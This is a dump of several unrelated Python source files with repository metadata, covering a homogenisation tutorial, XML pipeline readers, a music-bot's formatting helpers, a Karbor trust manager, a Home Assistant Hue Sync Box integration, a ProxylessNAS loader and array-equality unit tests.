] | null | null | null | tutorials/03_exact_integration_simple.py | vondrejc/FFTHomPy | 2c23c80dd2cab46f1090103e613b4f886b3daac7 | [
"MIT"
] | 10 | 2015-08-31T20:18:13.000Z | 2021-06-03T10:20:57.000Z | from __future__ import division, print_function
print("""
Numerical homogenisation based on exact integration, which is described in
J. Vondrejc, Improved guaranteed computable bounds on homogenized properties
of periodic media by FourierGalerkin method with exact integration,
Int. J. Numer. Methods Eng., 2016.
This is a self-contained tutorial implementing scalar problem in dim=2 or dim=3
on a unit periodic cell Y=(-0.5,0.5)**dim
with a square (2D) or cube (3D) inclusion of size 0.6 (side).
The material is identity I in matrix phase and 11*I in inclusion phase.
""")
import numpy as np
import itertools
from scipy.sparse.linalg import cg, LinearOperator
dim = 3 # number of spatial dimensions
N = dim*(5,) # number of discretization points
dN = tuple(2*np.array(N)-1) # double grid value
vec_shape=(dim,)+dN
# indicator function indicating the phase per grid point (square inclusion)
P = dim*(5,) # material resolution in each spatial dimension
phi = np.zeros(P, dtype='float')
if dim==2:
phi[1:4, 1:4] = 1
elif dim==3:
phi[1:4, 1:4, 1:4] = 1
# material coefficients at grid points
C = np.einsum('ij,...->ij...', 11*np.eye(dim), phi)
C += np.einsum('ij,...->ij...', 1*np.eye(dim), 1-phi)
# tensor products / (inverse) Fourier transform / frequencies
dot = lambda A, B: np.einsum('ij...,j...->i...', A, B)
fft = lambda x, N: np.fft.fftshift(np.fft.fftn(np.fft.ifftshift(x), N))/np.prod(np.array(N))
ifft = lambda x, N: np.fft.fftshift(np.fft.ifftn(np.fft.ifftshift(x), N))*np.prod(np.array(N))
freq_fun = lambda N: np.arange(np.fix(-N/2.), np.fix(N/2.+0.5))
freq = [freq_fun(n) for n in dN]
def get_weights(h): # calculation of integral weights of rectangular function
Wphi = np.zeros(dN) # integral weights
for ind in itertools.product(*[range(n) for n in dN]):
Wphi[ind] = np.prod(h)
for ii in range(dim):
Wphi[ind] *= np.sinc(h[ii]*freq[ii][ind[ii]])
return Wphi
def decrease(val, dN): # auxiliary function to remove unnecesary Fourier freq.
dN=np.array(dN)
N=np.array(val.shape[-dN.size:])
ibeg = np.array(np.fix((N-dN+(dN % 2))/2), dtype=np.int)
iend = np.array(np.fix((N+dN+(dN % 2))/2), dtype=np.int)
if dN.size==2:
return val[:,:,ibeg[0]:iend[0],ibeg[1]:iend[1]]
elif dN.size==3:
return val[:,:,ibeg[0]:iend[0],ibeg[1]:iend[1],ibeg[2]:iend[2]]
## GRID-BASED COMPOSITE ######### evaluate the matrix of Galerkin approximation
hC0 = np.prod(np.array(P))*fft(C, P)
if P == dN:
hCex = hC0
elif P > dN:
hCex = decrease(hC0, dN)
elif P < dN:
factor = np.max(np.ceil(np.array(dN) / np.array(P)))
hCper = np.tile(hC0, int(2*factor-1)*np.ones(dim, dtype=np.int))
hCex = decrease(hCper, dN)
Cex = ifft(np.einsum('ij...,...->ij...', hCex, get_weights(1./np.array(P))), dN).real
## INCLUSION-BASED COMPOSITE #### another expression of Cex
Wraw = get_weights(0.6*np.ones(dim))
"""HINT: the size 0.6 corresponds to the size of square inclusion; it is exactly
the size of topology generated by phi, i.e. 3x3 pixels in 5x5 image of PUC with
PUC size 1; then 0.6 = 3./5.
"""
char_square = ifft(Wraw, dN).real
Cex2 = np.einsum('ij...,...->ij...', 11*np.eye(dim), char_square)
Cex2 += np.einsum('ij...,...->ij...', 1*np.eye(dim), 1.-char_square)
## checking that the Cex2 is the same
print('zero check:', np.linalg.norm(Cex-Cex2))
Gamma = np.zeros((dim,dim)+ tuple(dN)) # zero initialize
for i,j in itertools.product(range(dim),repeat=2):
for ind in itertools.product(*[range(int((dN[k]-N[k])/2), int((dN[k]-N[k])/2+N[k])) for k in range(dim)]):
q = np.array([freq[ii][ind[ii]] for ii in range(dim)]) # frequency vector
if not q.dot(q) == 0: # zero freq. -> mean
Gamma[(i,j)+ind] = -(q[i]*q[j])/(q.dot(q))
# - convert to operators
G = lambda X: np.real(ifft(dot(Gamma, fft(X, dN)), dN)).reshape(-1)
A = lambda x: dot(Cex, x.reshape(vec_shape))
GA = lambda x: G(A(x))
# initiate strain/stress (2nd order tensor for each grid point)
X = np.zeros(vec_shape, dtype=np.float)
x = X.reshape(-1)
# macroscopic value
E = np.zeros_like(X); E[0] = 1.
b = -GA(E.reshape(-1))
# iterative solution of the linear system
Alinoper = LinearOperator(shape=(x.size, x.size), matvec=GA, dtype=np.float)
x, info = cg(A=Alinoper, b=b, x0=X.reshape(-1)) # conjugate gradients
state = x.reshape(vec_shape) + E
flux = dot(Cex, state)
AH_11 = np.sum(flux*state)/np.prod(np.array(dN)) # homogenised properties
print('homogenised coefficient (component 11) =', AH_11)
print('END')
| 39.313043 | 110 | 0.656492 | 802 | 4,521 | 3.67581 | 0.293017 | 0.030868 | 0.020353 | 0.020353 | 0.158752 | 0.138399 | 0.107191 | 0.107191 | 0.074627 | 0.059701 | 0 | 0.027675 | 0.160805 | 4,521 | 114 | 111 | 39.657895 | 0.749341 | 0.180491 | 0 | 0 | 0 | 0 | 0.190613 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0.04878 | 0 | 0.109756 | 0.060976 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9f9c4d3526307e32a5500958c3dd33e1cedd8eb | 2,289 | py | Python | pipeline/io/xml.py | probonas/pipeline | 96f565f2d827498efd31a7e76b74e0394ef2abc1 | [
"Apache-2.0"
] | 5 | 2020-04-11T15:12:07.000Z | 2021-09-13T04:15:47.000Z | pipeline/io/xml.py | probonas/pipeline | 96f565f2d827498efd31a7e76b74e0394ef2abc1 | [
"Apache-2.0"
] | 46 | 2019-04-22T20:36:40.000Z | 2022-01-12T18:03:32.000Z | pipeline/io/xml.py | probonas/pipeline | 96f565f2d827498efd31a7e76b74e0394ef2abc1 | [
"Apache-2.0"
] | 2 | 2020-05-27T20:49:53.000Z | 2021-03-17T04:21:38.000Z | import sys
import lxml.etree
from bonobo.constants import NOT_MODIFIED
from bonobo.nodes.io.file import FileReader
from bonobo.config import Configurable, Option, Service
class XMLReader(FileReader):
'''
A FileReader that parses an XML file and yields lxml.etree Element objects matching
the given XPath expression.
'''
xpath = Option(str, required=True)
def read(self, file):
root = lxml.etree.parse(file)
for e in root.xpath(self.xpath):
yield e
__call__ = read
class CurriedXMLReader(Configurable):
'''
Similar to XMLReader, this reader takes XML filenames as input, and for each parses
the XML content and yields lxml.etree Element objects matching the given XPath
expression.
'''
xpath = Option(str, required=True)
fs = Service(
'fs',
__doc__='''The filesystem instance to use.''',
) # type: str
mode = Option(
str,
default='r',
__doc__='''What mode to use for open() call.''',
) # type: str
encoding = Option(
str,
default='utf-8',
__doc__='''Encoding.''',
) # type: str
limit = Option(
int,
__doc__='''Limit the number of rows read (to allow early pipeline termination).''',
)
verbose = Option(
bool,
default=False
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.count = 0
def read(self, path, *, fs):
limit = self.limit
count = self.count
if not(limit) or (limit and count < limit):
if self.verbose:
sys.stderr.write('============================== %s\n' % (path,))
file = fs.open(path, self.mode, encoding=self.encoding)
root = lxml.etree.parse(file)
for e in root.xpath(self.xpath):
if limit and count >= limit:
break
count += 1
yield e
self.count = count
file.close()
__call__ = read
class ExtractXPath(Configurable):
xpath = Option(str, required=True)
def __call__(self, e):
for a in e.xpath(self.xpath):
yield a
class FilterXPathEqual(Configurable):
xpath = Option(str, required=True)
value = Option(str)
def __call__(self, e):
for t in e.xpath(self.xpath):
if t.text == self.value:
return NOT_MODIFIED
return None
def print_xml_element(e):
s = lxml.etree.tostring(e).decode('utf-8')
print(s.replace('\n', ' '))
return NOT_MODIFIED
def print_xml_element_text(e):
print(e.text)
return NOT_MODIFIED
| 23.121212 | 85 | 0.676715 | 326 | 2,289 | 4.601227 | 0.337423 | 0.042 | 0.037333 | 0.058667 | 0.275333 | 0.234667 | 0.18 | 0.18 | 0.18 | 0.18 | 0 | 0.002142 | 0.18436 | 2,289 | 98 | 86 | 23.357143 | 0.801285 | 0.138488 | 0 | 0.253333 | 0 | 0 | 0.098563 | 0.0154 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093333 | false | 0 | 0.066667 | 0 | 0.426667 | 0.053333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9fac466d61fa4e1209093752784a51baa09d5f3 | 3,063 | py | Python | YukkiMusic/utils/formatters.py | VasuXD/YukkiMusicBot | d7fdbd46d9fc793daedf624fa34fe644119bcb25 | [
"MIT"
] | null | null | null | YukkiMusic/utils/formatters.py | VasuXD/YukkiMusicBot | d7fdbd46d9fc793daedf624fa34fe644119bcb25 | [
"MIT"
] | null | null | null | YukkiMusic/utils/formatters.py | VasuXD/YukkiMusicBot | d7fdbd46d9fc793daedf624fa34fe644119bcb25 | [
"MIT"
] | null | null | null | #
# Copyright (C) 2021-2022 by TeamYukki@Github, < https://github.com/TeamYukki >.
#
# This file is part of < https://github.com/TeamYukki/YukkiMusicBot > project,
# and is released under the "GNU v3.0 License Agreement".
# Please see < https://github.com/TeamYukki/YukkiMusicBot/blob/master/LICENSE >
#
# All rights reserved.
from typing import Union
from pyrogram.types import Message
def get_readable_time(seconds: int) -> str:
count = 0
ping_time = ""
time_list = []
time_suffix_list = ["s", "m", "h", "days"]
while count < 4:
count += 1
if count < 3:
remainder, result = divmod(seconds, 60)
else:
remainder, result = divmod(seconds, 24)
if seconds == 0 and remainder == 0:
break
time_list.append(int(result))
seconds = int(remainder)
for i in range(len(time_list)):
time_list[i] = str(time_list[i]) + time_suffix_list[i]
if len(time_list) == 4:
ping_time += time_list.pop() + ", "
time_list.reverse()
ping_time += ":".join(time_list)
return ping_time
def convert_bytes(size: float) -> str:
"""humanize size"""
if not size:
return ""
power = 1024
t_n = 0
power_dict = {0: " ", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
while size > power:
size /= power
t_n += 1
return "{:.2f} {}B".format(size, power_dict[t_n])
async def int_to_alpha(user_id: int) -> str:
alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
text = ""
user_id = str(user_id)
for i in user_id:
text += alphabet[int(i)]
return text
async def alpha_to_int(user_id_alphabet: str) -> int:
alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j"]
user_id = ""
for i in user_id_alphabet:
index = alphabet.index(i)
user_id += str(index)
user_id = int(user_id)
return user_id
def time_to_seconds(time):
stringt = str(time)
return sum(
int(x) * 60**i
for i, x in enumerate(reversed(stringt.split(":")))
)
def seconds_to_min(seconds):
if seconds is not None:
seconds = int(seconds)
d, h, m, s = (
seconds // (3600 * 24),
seconds // 3600 % 24,
seconds % 3600 // 60,
seconds % 3600 % 60,
)
if d > 0:
return "{:02d}:{:02d}:{:02d}:{:02d}".format(d, h, m, s)
elif h > 0:
return "{:02d}:{:02d}:{:02d}".format(h, m, s)
elif m > 0:
return "{:02d}:{:02d}".format(m, s)
elif s > 0:
return "00:{:02d}".format(s)
return "-"
formats = [
"webm",
"mkv",
"flv",
"vob",
"ogv",
"ogg",
"rrc",
"gifv",
"mng",
"mov",
"avi",
"qt",
"wmv",
"yuv",
"rm",
"asf",
"amv",
"mp4",
"m4p",
"m4v",
"mpg",
"mp2",
"mpeg",
"mpe",
"mpv",
"m4v",
"svi",
"3gp",
"3g2",
"mxf",
"roq",
"nsv",
"flv",
"f4v",
"f4p",
"f4a",
"f4b",
]
| 22.195652 | 80 | 0.501469 | 405 | 3,063 | 3.679012 | 0.387654 | 0.044295 | 0.028188 | 0.046309 | 0.142953 | 0.048322 | 0.048322 | 0.024161 | 0.024161 | 0.024161 | 0 | 0.046523 | 0.319295 | 3,063 | 137 | 81 | 22.357664 | 0.668106 | 0.106105 | 0 | 0.053571 | 0 | 0 | 0.085138 | 0.009908 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.017857 | 0 | 0.151786 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9fea1cdc53e3c61b7fd002e8743d6e65365ae7f | 3,742 | py | Python | karbor-1.3.0/karbor/services/operationengine/user_trust_manager.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 1 | 2021-05-23T01:48:25.000Z | 2021-05-23T01:48:25.000Z | karbor-1.3.0/karbor/services/operationengine/user_trust_manager.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | karbor-1.3.0/karbor/services/operationengine/user_trust_manager.py | scottwedge/OpenStack-Stein | 7077d1f602031dace92916f14e36b124f474de15 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from karbor.common import karbor_keystone_plugin
LOG = logging.getLogger(__name__)
class UserTrustManager(object):
def __init__(self):
super(UserTrustManager, self).__init__()
self._user_trust_map = {}
self._skp = karbor_keystone_plugin.KarborKeystonePlugin()
def _user_trust_key(self, user_id, project_id):
return "%s_%s" % (user_id, project_id)
def _add_user_trust_info(self, user_id, project_id,
operation_id, trust_id, session):
key = self._user_trust_key(user_id, project_id)
self._user_trust_map[key] = {
'operation_ids': {operation_id},
'trust_id': trust_id,
'session': session
}
def _get_user_trust_info(self, user_id, project_id):
return self._user_trust_map.get(
self._user_trust_key(user_id, project_id))
def _del_user_trust_info(self, user_id, project_id):
key = self._user_trust_key(user_id, project_id)
del self._user_trust_map[key]
def get_token(self, user_id, project_id):
auth_info = self._get_user_trust_info(user_id, project_id)
if not auth_info:
return None
try:
return auth_info['session'].get_token()
except Exception:
LOG.exception("Get token failed, user_id=%(user_id)s, "
"project_id=%(proj_id)s",
{'user_id': user_id, 'proj_id': project_id})
return None
def add_operation(self, context, operation_id):
auth_info = self._get_user_trust_info(
context.user_id, context.project_id)
if auth_info:
auth_info['operation_ids'].add(operation_id)
return auth_info['trust_id']
trust_id = self._skp.create_trust_to_karbor(context)
try:
lsession = self._skp.create_trust_session(trust_id)
except Exception:
self._skp.delete_trust_to_karbor(trust_id)
raise
self._add_user_trust_info(context.user_id, context.project_id,
operation_id, trust_id, lsession)
return trust_id
def delete_operation(self, context, operation_id):
auth_info = self._get_user_trust_info(
context.user_id, context.project_id)
if not auth_info:
return
operation_ids = auth_info['operation_ids']
operation_ids.discard(operation_id)
if len(operation_ids) == 0:
self._skp.delete_trust_to_karbor(auth_info['trust_id'])
self._del_user_trust_info(context.user_id, context.project_id)
def resume_operation(self, operation_id, user_id, project_id, trust_id):
auth_info = self._get_user_trust_info(user_id, project_id)
if auth_info:
auth_info['operation_ids'].add(operation_id)
return
try:
lsession = self._skp.create_trust_session(trust_id)
except Exception:
raise
self._add_user_trust_info(user_id, project_id,
operation_id, trust_id, lsession)
| 35.980769 | 78 | 0.646713 | 492 | 3,742 | 4.528455 | 0.223577 | 0.056553 | 0.06912 | 0.087522 | 0.48474 | 0.450628 | 0.402603 | 0.366248 | 0.286355 | 0.218133 | 0 | 0.001837 | 0.272582 | 3,742 | 103 | 79 | 36.330097 | 0.816679 | 0.145911 | 0 | 0.422535 | 0 | 0 | 0.053442 | 0.006916 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126761 | false | 0 | 0.028169 | 0.028169 | 0.295775 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9fec7c77af3629a8aa1a529833cc19bcd959e3d | 7,309 | py | Python | config/custom_components/huesyncbox/__init__.py | LRvdLinden/homeassistant-config | 4f0e8bb08329b8af08fc90cb1699a9314e297ab7 | [
"MIT"
] | 288 | 2021-04-27T07:25:04.000Z | 2022-03-23T14:38:36.000Z | config/custom_components/huesyncbox/__init__.py | givemhell/homeassistant-config | 8ca951d299cb4df19e5fcc37bfea38c9f04f5a2a | [
"MIT"
] | 6 | 2021-04-30T10:47:24.000Z | 2022-01-12T01:14:15.000Z | config/custom_components/huesyncbox/__init__.py | givemhell/homeassistant-config | 8ca951d299cb4df19e5fcc37bfea38c9f04f5a2a | [
"MIT"
] | 28 | 2021-04-30T23:58:07.000Z | 2022-02-15T04:33:46.000Z | """The Philips Hue Play HDMI Sync Box integration."""
import asyncio
import logging
import json
import os
import voluptuous as vol
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers import (config_validation as cv)
from homeassistant.helpers.config_validation import make_entity_service_schema
from homeassistant.helpers.service import async_extract_entity_ids
from homeassistant.components.light import ATTR_BRIGHTNESS, ATTR_BRIGHTNESS_STEP
from .huesyncbox import HueSyncBox, async_remove_entry_from_huesyncbox
from .const import DOMAIN, LOGGER, ATTR_SYNC, ATTR_SYNC_TOGGLE, ATTR_MODE, ATTR_MODE_NEXT, ATTR_MODE_PREV, MODES, ATTR_INTENSITY, ATTR_INTENSITY_NEXT, ATTR_INTENSITY_PREV, INTENSITIES, ATTR_INPUT, ATTR_INPUT_NEXT, ATTR_INPUT_PREV, INPUTS, ATTR_ENTERTAINMENT_AREA, SERVICE_SET_SYNC_STATE, SERVICE_SET_BRIGHTNESS, SERVICE_SET_MODE, SERVICE_SET_INTENSITY, SERVICE_SET_ENTERTAINMENT_AREA
CONFIG_SCHEMA = vol.Schema({DOMAIN: vol.Schema({})}, extra=vol.ALLOW_EXTRA)
PLATFORMS = ["media_player"]
HUESYNCBOX_SET_STATE_SCHEMA = make_entity_service_schema(
{
vol.Optional(ATTR_SYNC): cv.boolean,
vol.Optional(ATTR_SYNC_TOGGLE): cv.boolean,
vol.Optional(ATTR_BRIGHTNESS): cv.small_float,
vol.Optional(ATTR_BRIGHTNESS_STEP): vol.All(vol.Coerce(float), vol.Range(min=-1, max=1)),
vol.Optional(ATTR_MODE): vol.In(MODES),
vol.Optional(ATTR_MODE_NEXT): cv.boolean,
vol.Optional(ATTR_MODE_PREV): cv.boolean,
vol.Optional(ATTR_INTENSITY): vol.In(INTENSITIES),
vol.Optional(ATTR_INTENSITY_NEXT): cv.boolean,
vol.Optional(ATTR_INTENSITY_PREV): cv.boolean,
vol.Optional(ATTR_INPUT): vol.In(INPUTS),
vol.Optional(ATTR_INPUT_NEXT): cv.boolean,
vol.Optional(ATTR_INPUT_PREV): cv.boolean,
vol.Optional(ATTR_ENTERTAINMENT_AREA): cv.string,
}
)
HUESYNCBOX_SET_BRIGHTNESS_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_BRIGHTNESS): cv.small_float}
)
HUESYNCBOX_SET_MODE_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_MODE): vol.In(MODES)}
)
HUESYNCBOX_SET_INTENSITY_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_INTENSITY): vol.In(INTENSITIES), vol.Optional(ATTR_MODE): vol.In(MODES)}
)
HUESYNCBOX_SET_ENTERTAINMENT_AREA_SCHEMA = make_entity_service_schema(
{vol.Required(ATTR_ENTERTAINMENT_AREA): cv.string}
)
services_registered = False
async def async_setup(hass: HomeAssistant, config: dict):
"""
Set up the Philips Hue Play HDMI Sync Box integration.
Only supporting zeroconf, so nothing to do here.
"""
hass.data[DOMAIN] = {}
return True
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Set up a config entry for Philips Hue Play HDMI Sync Box."""
LOGGER.debug("%s async_setup_entry\nentry:\n%s\nhass.data\n%s" % (__name__, str(entry), hass.data[DOMAIN]))
huesyncbox = HueSyncBox(hass, entry)
hass.data[DOMAIN][entry.data["unique_id"]] = huesyncbox
if not await huesyncbox.async_setup():
return False
for platform in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(entry, platform)
)
# Register services on first entry
global services_registered
if not services_registered:
await async_register_services(hass)
services_registered = True
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry):
"""Unload a config entry."""
unload_ok = all(
await asyncio.gather(
*[
hass.config_entries.async_forward_entry_unload(entry, platform)
for platform in PLATFORMS
]
)
)
if unload_ok:
huesyncbox = hass.data[DOMAIN].pop(entry.data["unique_id"])
await huesyncbox.async_reset()
# Unregister services when last entry is unloaded
if len(hass.data[DOMAIN].items()) == 0:
await async_unregister_services(hass)
global services_registered
services_registered = False
return unload_ok
async def async_remove_entry(hass: HomeAssistant, entry: ConfigEntry) -> None:
# Best effort cleanup. User might not even have the device anymore or had it factory reset.
# Note that the entry already has been unloaded.
try:
await async_remove_entry_from_huesyncbox(entry)
except Exception as e:
LOGGER.warning("Unregistering Philips Hue Play HDMI Sync Box failed: %s ", e)
async def async_register_services(hass: HomeAssistant):
async def async_set_sync_state(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_sync_state(call.data)
hass.services.async_register(
DOMAIN, SERVICE_SET_SYNC_STATE, async_set_sync_state, schema=HUESYNCBOX_SET_STATE_SCHEMA
)
async def async_set_sync_mode(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_sync_mode(call.data.get(ATTR_MODE))
hass.services.async_register(
DOMAIN, SERVICE_SET_MODE, async_set_sync_mode, schema=HUESYNCBOX_SET_MODE_SCHEMA
)
async def async_set_intensity(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_intensity(call.data.get(ATTR_INTENSITY), call.data.get(ATTR_MODE, None))
hass.services.async_register(
DOMAIN, SERVICE_SET_INTENSITY, async_set_intensity, schema=HUESYNCBOX_SET_INTENSITY_SCHEMA
)
async def async_set_brightness(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_set_brightness(call.data.get(ATTR_BRIGHTNESS))
hass.services.async_register(
DOMAIN, SERVICE_SET_BRIGHTNESS, async_set_brightness, schema=HUESYNCBOX_SET_BRIGHTNESS_SCHEMA
)
async def async_set_entertainment_area(call):
entity_ids = await async_extract_entity_ids(hass, call)
for _, entry in hass.data[DOMAIN].items():
if entry.entity and entry.entity.entity_id in entity_ids:
await entry.entity.async_select_entertainment_area(call.data.get(ATTR_ENTERTAINMENT_AREA))
hass.services.async_register(
DOMAIN, SERVICE_SET_ENTERTAINMENT_AREA, async_set_entertainment_area, schema=HUESYNCBOX_SET_ENTERTAINMENT_AREA_SCHEMA
)
async def async_unregister_services(hass):
hass.services.async_remove(DOMAIN, SERVICE_SET_SYNC_STATE)
hass.services.async_remove(DOMAIN, SERVICE_SET_BRIGHTNESS)
hass.services.async_remove(DOMAIN, SERVICE_SET_MODE)
hass.services.async_remove(DOMAIN, SERVICE_SET_INTENSITY)
hass.services.async_remove(DOMAIN, SERVICE_SET_ENTERTAINMENT_AREA)
| 39.722826 | 383 | 0.738131 | 968 | 7,309 | 5.272727 | 0.163223 | 0.028213 | 0.044083 | 0.031348 | 0.501763 | 0.370102 | 0.304859 | 0.210227 | 0.144005 | 0.144005 | 0 | 0.0005 | 0.178684 | 7,309 | 183 | 384 | 39.939891 | 0.849742 | 0.036393 | 0 | 0.195489 | 0 | 0 | 0.019501 | 0.006452 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.097744 | 0 | 0.12782 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7016a36ae131d4a62b304569a0a5345a17c8a87 | 495 | py | Python | modeling/networks/proxylessnas.py | RunpeiDong/DGMS | 1f6a7ca9f39a2bc31cfade1e45967b006ea6532d | [
"Apache-2.0"
] | 2 | 2022-01-03T05:25:01.000Z | 2022-01-06T23:08:50.000Z | modeling/networks/proxylessnas.py | RunpeiDong/DGMS | 1f6a7ca9f39a2bc31cfade1e45967b006ea6532d | [
"Apache-2.0"
] | null | null | null | modeling/networks/proxylessnas.py | RunpeiDong/DGMS | 1f6a7ca9f39a2bc31cfade1e45967b006ea6532d | [
"Apache-2.0"
] | 1 | 2022-02-28T01:13:30.000Z | 2022-02-28T01:13:30.000Z | import torch
def proxyless_nas_mobile(args):
target_platform = "proxyless_mobile" # proxyless_gpu, proxyless_mobile, proxyless_mobile14 are also avaliable.
if args.pretrained:
model = torch.hub.load('mit-han-lab/ProxylessNAS', target_platform, pretrained=True)
print("ImageNet pretrained ProxylessNAS-Mobile loaded! (Pretrained Top-1 Acc: 74.59%)")
else:
model = torch.hub.load('mit-han-lab/ProxylessNAS', target_platform, pretrained=False)
return model
| 45 | 114 | 0.739394 | 62 | 495 | 5.758065 | 0.564516 | 0.117647 | 0.134454 | 0.095238 | 0.347339 | 0.347339 | 0.347339 | 0.347339 | 0.347339 | 0.347339 | 0 | 0.016787 | 0.157576 | 495 | 10 | 115 | 49.5 | 0.839329 | 0.143434 | 0 | 0 | 0 | 0 | 0.336493 | 0.113744 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e701d8319474ec61648531dd3164c26ea90f0f94 | 3,504 | py | Python | hellopy/test/utils/test.py | odys-z/hello | 39ca67cae34eb4bc4cbd848a06b3c0d65a995954 | [
"MIT"
] | null | null | null | hellopy/test/utils/test.py | odys-z/hello | 39ca67cae34eb4bc4cbd848a06b3c0d65a995954 | [
"MIT"
] | 3 | 2021-04-17T18:36:24.000Z | 2022-03-04T20:30:09.000Z | hellopy/test/utils/test.py | odys-z/hello | 39ca67cae34eb4bc4cbd848a06b3c0d65a995954 | [
"MIT"
] | null | null | null | '''
Created on 22 Dec 2019
@author: ody
'''
import unittest
from utils.Assrt import Eq, AssertErr, XdArrParser
class Test(unittest.TestCase):
def testArrEq(self):
eq = Eq()
try:
eq.int2dArr([[]], [[1]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[]], [])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1]], [[]])
self.fail("Error not checked")
except AssertErr as e:
# [] not in [[1]]
print(e)
try:
eq.int2dArr([[2]], [[1]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[2], [1]], [[1], [3]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1]], [[1, 2]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1, 2], [2, 1], [1, 3, 5]], [[2, 1], [1, 2], [3, 1, 6]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1, 2], [2, 1], [1, 3, 6], [0]], [[2, 1], [1, 2], [3, 1, 6]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
try:
eq.int2dArr([[1, 2], [2, 1], [1, 3, 6], [0]], [[2, 1], [1, 2], [3, 1, 6], [1]])
self.fail("Error not checked")
except AssertErr as e:
print(e)
eq.int2dArr([], [])
eq.int2dArr([[]], [[]])
eq.int2dArr([[1, 2]], [[2, 1]])
eq.int2dArr([[1, 2], [2, 1]], [[2, 1], [1, 2]])
eq.int2dArr([[1, 2], [2, 1], [1, 3, 4]], [[2, 1], [1, 2], [3, 1, 4]])
def testPasrsArr(self):
eq = Eq()
parse2d = XdArrParser(2)
a2d = parse2d.parseInt("[[1,2],[3]]")
print(a2d)
eq.int2dArr([[1,2], [3]], a2d)
a2d = parse2d.parseInt("[[1],[3]]")
eq.int2dArr([[1], [3]], a2d)
a2d = parse2d.parseInt("[[1],[3,1]]")
eq.int2dArr([[1], [3,1]], a2d)
